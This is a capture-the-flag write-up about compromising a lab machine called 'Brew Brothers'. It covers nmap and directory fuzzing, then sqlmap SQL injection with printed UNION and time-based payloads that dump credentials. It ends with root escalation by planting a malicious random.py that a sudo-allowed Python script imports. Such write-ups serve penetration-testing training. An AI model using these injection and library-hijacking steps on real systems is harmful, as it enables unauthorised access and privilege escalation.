Category: SQL Injection
Obtain user and root flags
Answer all questions
The Brew brothers have a vulnerable Website. Can you hack into it?
Diving in into the barrel
The box is pretty direct and easy because we already know that we are supposed to perform SQL Injection on a website but don't know where it occurs.
Before anything, check if your VPN is running and try pinging the box to ensure it's up for hacking.
A toast to Nmap
We need to run a simple yet so comprehensive nmap scan to make sure which port our web server is hosted on this machine
nmap 10.14.0.32 Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 50.52 seconds
Sweet!!, we have 2 ports open
80 http , 22 ssh
As we saw earlier, we are supposed to perform SQL injection so no need to concentrate on
ssh . If you find yourself brute-forcing
ssh just know you're doing something wrong (or not :-) )
Anyway without wasting time, let's jump straight into enumerating the web server
Bytes and Barleys: Apache's Tap
First of all, we need to enumerate the webserver manually by visiting the website in our browser.
Honestly, that doesn't look good at all. The only thing we should be looking at here is either the Apache version, developer comments, or response headers (For starters) But this should not stop us from doing further enumeration.
We need to find that SQLi by "fire by ffuf", You see what I did there? OK moving on!
Fizzing Fuzz and Fermented
After not finding anything useful from the default Apache website. we move forward to fuzzing for hidden directories and files using
feroxbuster you can use
feroxbuster because I like them and they have good color output.
ffuf -u "
" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc all -fc 404 -ic -e .bak,.db,.config,.txt,.backup,.php,.html,.htm,.tar,.zip,.js,.env,.proto -c
As you can see my syntax is longer than NFTs hype, let's try another one with
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x py,html,config,conf,txt,php,dev,backup,bak,pcap,properties,jpg,png,jpeg,pdf,db -k
LMAO, still longer.
The advantage of using
feroxbuster is that it will fuzz recursively and it has a cool name: "Feric Oxide"
And the results are out:
http://10.14.0.32/index.html http://10.14.0.32/website http://10.14.0.32/website/index.html http://10.14.0.32/website/search.html http://10.14.0.32/website/search.php http://10.14.0.32/website/contact.html http://10.14.0.32/website/contact.php http://10.14.0.32/website/l.txt
That's brilliant init! we have something to look into
I assume we all hate PHP, let's get into injectin'
Are we though? We shall find that out later. moving on
Bruh!!??. We didn't even search for anything but it's ok
Since we are not getting anything useful so far, we need to capture the requests using Burp to see what's brewing down there.
We are onto nothing here, Let's try saving both requests and run them through SQLmap hoping for the good.
That didn't work, I guess we should re-evaluate our choices about our hate for PHP and direct it to HTML. Remember we have other endpoints with the same names but they have
.html . We should check them out:
Damn!, That's a lot of input fields you got there. Moving on!
Now that's where I would like to inject my bad stuff.
A shot of SQL Injection: Brew with Caution!
We can capture a search request
http://10.14.0.32/website/search.html and take it through sqlmap to see if we can get anything juicy
sqlmap -r search --risk 3 --level 5 --dbs
Parameter: search (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: search=hHIb' AND (SELECT 8709 FROM (SELECT(SLEEP(5)))mmPE) AND 'lQVH'='lQVH Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: search=hHIb' UNION ALL SELECT CONCAT(0x7176626a71,0x734243434c67584b654d786e6173774b4a76596348697a4d515073694e69456874766a774d47484d,0x7178707671),NULL-- -
Holy Hack !!!!, this should be easy
available databases : [*] creds [*] information_schema [*] lol [*] mysql [*] performance_schema [*] products [*] sys
creds , I will have those creds on the go
Now we run this oneliner that will dump those creds
sqlmap -r search2.req --batch -D creds --tables --dump
Database: creds Table: credentials [1 entry] +----------+----------+ | password | username | +----------+----------+ | p*****r | charles | +----------+----------+
Who stores their passwords in clear text? anyway that adds a fine addition to our collection
We can use the creds on ssh and voila! we have our initial foothold.
The Root Beer chronicles
Congratulations on your user access, now the only thing remaining is gaining root access to this machine.
Before pwning, We need to make our environment stable using the following commands:
python3 -c 'import pty;pty.spawn("/bin/bash")' export term=XTERM
Sweet!, now it's hackin' time. get Your hacker gloves and leggings!!
As we can see on the user directory, We have
charles@brew-brothers:~$ cat note.txt Hello charles Dale here, make sure you finish the backup script for the admin panel. Cheers, Dale
import random import requests import hashlib url = "http://10.14.0.32" r = requests.post(url+"/zend.php") earl = str(r.text) def encrypt(string): sha = \ hashlib.sha256(string.encode()).hexdigest() return sha print("\n") crk = encrypt(earl) crk = crk + str(random.randint(1,100)) with open("/tmp/websitebackupass.txt","a") as web: web.write(crk+":"+earl) web.write("\n")
Now let's execute
sudo -l to see what local man
charles can execute with sudo rights on the machine.
User charles may run the following commands on brew-brothers: (ALL) NOPASSWD: /usr/bin/python3.8 /home/charles/backup.py
Do you smell it? Python Library hijacking
Let's get into it, shall WE?
nano or vim random.py then slap this bad boy:
import os os.system("/bin/bash")
Save it and execute the
backup.py as root to gain root access. EZ
sudo -u root /usr/bin/python3.8 /home/charles/backup.py
root@brew-brothers:/home/charles# id uid=0(root) gid=0(root) groups=0(root) root@brew-brothers:/home/charles#
Good luck with your next machine.